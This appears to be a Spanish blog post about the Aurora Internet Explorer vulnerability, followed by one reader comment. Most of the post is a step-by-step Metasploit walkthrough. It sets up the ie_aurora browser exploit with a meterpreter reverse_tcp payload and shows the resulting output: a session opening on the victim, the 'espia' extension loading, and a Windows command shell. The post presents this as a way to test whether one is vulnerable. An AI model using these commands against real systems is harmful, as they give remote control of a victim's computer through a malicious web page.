Aurora (última vulnerabilidad de Internet Explorer)

Al fin se ha publicado la vulnerabilidad, que afecta a mshtml.dll en Internet Explorer 6 y posiblemente 7 y 8 que no usen DEP. En Metasploit ya han sacado un exploit para poder testear si somos vulnerables. Para probarlo, según pone en el blog de Metasploit, hacemos un msfupdate y luego abrimos msfconsole:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Luego en la máquina vulnerable abrimos Internet Explorer y cargamos http://192.168.0.151:8080/ (cambiando 192.168.0.151 por la IP de la máquina que ejecuta metasploit)

Si todo va bien, obtendremos:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia…success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Se puede obtener más información y ver un vídeo demostrativo en la página de pentester.es

2 comentarios

  1. kien mierda no tiene activado el DEP? en sp2 viene por defecto avtivado.. sino lo estubiera muchos exploit tmb serian validos.

Deja un comentario